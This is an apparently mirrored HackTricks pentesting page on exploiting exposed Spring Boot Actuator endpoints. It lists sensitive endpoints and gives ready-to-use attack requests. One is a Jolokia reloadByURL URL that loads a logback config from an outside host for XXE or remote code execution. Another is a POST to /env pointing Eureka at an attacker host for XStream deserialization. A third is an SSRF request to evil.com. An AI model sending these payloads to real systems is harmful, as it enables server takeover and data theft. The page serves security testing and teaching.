Skip to content

Spring Actuators

[AD REMOVED]

Spring Auth Bypass

From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Exploiting Spring Boot Actuators

Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Key Points:

  • Spring Boot Actuators register endpoints such as /health, /trace, /beans, /env, etc. In versions 1 to 1.4, these endpoints are accessible without authentication. From version 1.5 onwards, only /health and /info are non-sensitive by default, but developers often disable this security.
  • Certain Actuator endpoints can expose sensitive data or allow harmful actions:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, and /heapdump.
  • In Spring Boot 1.x, actuators are registered under the root URL, while in 2.x, they are under the /actuator/ base path.

Exploitation Techniques:

  1. Remote Code Execution via '/jolokia':
  2. The /jolokia actuator endpoint exposes the Jolokia Library, which allows HTTP access to MBeans.
  3. The reloadByURL action can be exploited to reload logging configurations from an external URL, which can lead to blind XXE or Remote Code Execution via crafted XML configurations.
  4. Example exploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

  5. Config Modification via '/env':

  6. If Spring Cloud Libraries are present, the /env endpoint allows modification of environmental properties.

  7. Properties can be manipulated to exploit vulnerabilities, such as the XStream deserialization vulnerability in the Eureka serviceURL.

  8. Example exploit POST request:

    POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

  9. Other Useful Settings:

  10. Properties like spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, and spring.datasource.tomcat.max-active can be manipulated for various exploits, such as SQL injection or altering database connection strings.

Additional Information:

  • A comprehensive list of default actuators can be found here.
  • The /env endpoint in Spring Boot 2.x uses JSON format for property modification, but the general concept remains the same.
  1. Env + H2 RCE:
    • Details on exploiting the combination of /env endpoint and H2 database can be found here.
  2. SSRF on Spring Boot Through Incorrect Pathname Interpretation:
    - The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
- Example exploit request:

         ```http
         GET ;@evil.com/url HTTP/1.1
         Host: target.com
         Connection: close
         ```

[AD REMOVED]

All content on this page is from HackTricks, which belongs to Carlos Polop and is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license unless otherwise specified. This page is generated from the HackTricks wiki and just has the ads removed.